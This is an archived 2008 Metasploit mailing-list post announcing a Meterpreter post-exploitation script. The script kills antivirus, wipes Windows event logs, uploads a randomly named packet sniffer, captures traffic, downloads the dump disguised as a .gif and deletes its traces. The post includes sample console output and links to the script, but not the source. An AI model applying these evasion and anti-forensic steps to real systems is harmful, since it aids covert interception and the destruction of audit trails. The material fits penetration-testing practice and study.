Metasploit mailing list archives
Meterpreter tcpdump script
From: matteo.cantoni at gmail.com (Matteo Cantoni)
Date: Fri, 14 Nov 2008 01:29:45 +0100
New version with new options : - binary and dump name setting (or random!) - dump extension setting - tcpdump options and filters - antivirus killer meterpreter > run tcpdump [*] Killing Antivirus services on the target... [*] |_ Killing off zonealarm.exe... [*] Clearing the all events logs! [*] Uploading executable CVRKF.exe to target! [*] Run %SystemDrive%\CVRKF.exe -i 2 -w %SystemDrive%\CQXYC.gif -s 0 not port 22 [*] Sniffing for 600 seconds! [*] Killing off CVRKF.exe after 600 seconds (pid 1580) [*] Downloading dump file CQXYC.gif... [*] Removing CVRKF.exe and CQXYC.gif from target! [*] Clearing the all events logs! [*] Done! meterpreter > - http://www.nothink.org/metasploit/tcpdump.rb - http://www.nothink.org/metasploit/tcpdump.zip (md5 : bf3330ce04c5cd409f81ad09a301959c) 2008/11/12 Matteo Cantoni <matteo.cantoni at gmail.com>
Hi, ok ok I know this is a simple meterpreter script, but it seem works and I wrote it drinking some beers in a pub :) 1) clears all the event logs (if log_clear is 1) 2) upload tcpdump.exe (compiled with Packet Sniffer SDK, WinPCap is not required) on target with random name 3) create a dump file with random name 4) kill sniffer's process on target 5) download dump file from target 6) remove sniffer and dump from target 7) clears all the event logs (if log_clear is 1) meterpreter > run tcpdump [*] Clearing the all events logs! [*] Uploading executable OROPJ.exe to target! [*] Sniffing for 600 seconds! (interface 2, dump file ZZTCN.pcap) [*] Killing off OROPJ.exe after 600 seconds (pid 744) [*] Downloading dump file ZZTCN.pcap... [*] Removing OROPJ.exe and ZZTCN.pcap! [*] Clearing the all events logs! [*] Done! meterpreter > You could add also some tcpdump filters etc... - http://www.nothink.org/metasploit/tcpdump.rb - http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/PacketStuff-Network-Toolkit.shtml(tnx Thierry) Matteo
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081114/829a91ad/attachment.htm>
Current thread:
- Meterpreter tcpdump script Matteo Cantoni (Nov 12)
- Meterpreter tcpdump script Matteo Cantoni (Nov 13)
- Meterpreter tcpdump script Jun Koi (Nov 13)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Thierry Zoller (Nov 14)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Jerome Athias (Nov 14)
- Meterpreter tcpdump script Jun Koi (Nov 16)